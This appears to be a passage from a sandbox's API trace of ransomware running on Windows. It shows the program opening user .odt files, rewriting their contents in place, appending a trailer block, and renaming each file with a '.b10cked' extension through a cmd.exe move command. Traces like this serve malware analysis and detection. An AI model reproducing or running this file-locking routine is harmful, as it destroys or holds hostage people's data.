returned 1 [0138.028] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.028] ReleaseMutex (hMutex=0xf8) returned 1 [0138.029] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.029] ReleaseMutex (hMutex=0xf8) returned 1 [0138.029] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.029] ReleaseMutex (hMutex=0xf8) returned 1 [0138.029] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt" (normalized: "c:\\users\\eebsym5\\desktop\\egb3usbk0idbq.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0138.029] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.029] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x784c [0138.029] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.029] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19481823206) returned 1 [0138.029] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.029] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x784c [0138.029] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.029] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.029] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x784c [0138.029] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.029] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.029] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x784c [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x784c [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x784c [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x784c [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x784c [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x784c [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.031] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x784c [0138.031] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.031] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x7364 [0138.031] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0138.032] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0138.032] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.032] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x784c [0138.032] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.032] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0138.032] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.032] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x784c [0138.032] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.032] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.032] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x3c25, 
lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x3c25, lpOverlapped=0x0) returned 1 [0138.033] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.033] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x3c25, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x3c25, lpOverlapped=0x0) returned 1 [0138.033] SetFilePointer (in: hFile=0x114, lDistanceToMove=-15397, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x3c27 [0138.033] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x3c25, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x3c25, lpOverlapped=0x0) returned 1 [0138.033] SetFilePointer (in: hFile=0x114, lDistanceToMove=-15397, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x3c27 [0138.033] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x3c25, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x3c25, lpOverlapped=0x0) returned 1 [0138.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="egB3USbk0IDbq.odt", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0138.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="egB3USbk0IDbq.odt", cchWideChar=17, lpMultiByteStr=0x13286f4, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="egB3USbk0IDbq.odt", lpUsedDefaultChar=0x0) returned 17 [0138.040] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, 
dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x784c [0138.040] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0138.040] CloseHandle (hObject=0x114) returned 1 [0138.041] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT") returned 0x25 [0138.042] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0138.042] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT\" \"C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT\" \"C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xe60, dwThreadId=0xe5c)) returned 1 [0138.050] CloseHandle (hObject=0x110) returned 1 [0138.050] CloseHandle (hObject=0x114) returned 1 [0138.050] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.050] CharUpperBuffW (in: 
lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0138.050] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount2=47) returned 1 [0138.050] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.050] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.050] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0138.050] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.050] ReleaseMutex (hMutex=0xf8) returned 1 [0138.050] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.050] ReleaseMutex (hMutex=0xf8) returned 1 [0138.051] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.051] ReleaseMutex (hMutex=0xf8) returned 1 [0138.051] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.051] ReleaseMutex (hMutex=0xf8) returned 1 [0138.051] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\vaFvM9aFd9qECGT.odt" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\wxmd5ucxt4ttzyn6xhkt\\vafvm9afd9qecgt.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0138.051] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.051] SetFilePointer (in: hFile=0x114, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1427a [0138.051] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.051] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19484028658) returned 1 [0138.051] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.051] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1427a [0138.051] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.051] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.051] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1427a [0138.051] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.051] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x1427a [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.052] SetFilePointer (in: hFile=0x114, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1427a [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1427a [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1427a [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1427a [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.052] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1427a [0138.053] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.053] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.053] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1427a [0138.053] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.053] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x13d92 [0138.053] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0138.054] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0138.054] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.054] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x1427a [0138.054] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.054] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0138.054] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.054] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x1427a [0138.054] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.055] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.055] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xa13c, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xa13c, lpOverlapped=0x0) returned 1 [0138.055] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.055] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xa13c, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xa13c, lpOverlapped=0x0) returned 1 [0138.055] SetFilePointer (in: hFile=0x114, lDistanceToMove=-41276, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa13e [0138.056] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xa13c, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xa13c, lpOverlapped=0x0) returned 1 
[0138.056] SetFilePointer (in: hFile=0x114, lDistanceToMove=-41276, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa13e [0138.056] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xa13c, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xa13c, lpOverlapped=0x0) returned 1 [0138.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vaFvM9aFd9qECGT.odt", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0138.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vaFvM9aFd9qECGT.odt", cchWideChar=19, lpMultiByteStr=0x13286f4, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vaFvM9aFd9qECGT.odt", lpUsedDefaultChar=0x0) returned 19 [0138.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x1427a [0138.062] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0138.062] CloseHandle (hObject=0x114) returned 1 [0138.063] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\vaFvM9aFd9qECGT.odt", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT") returned 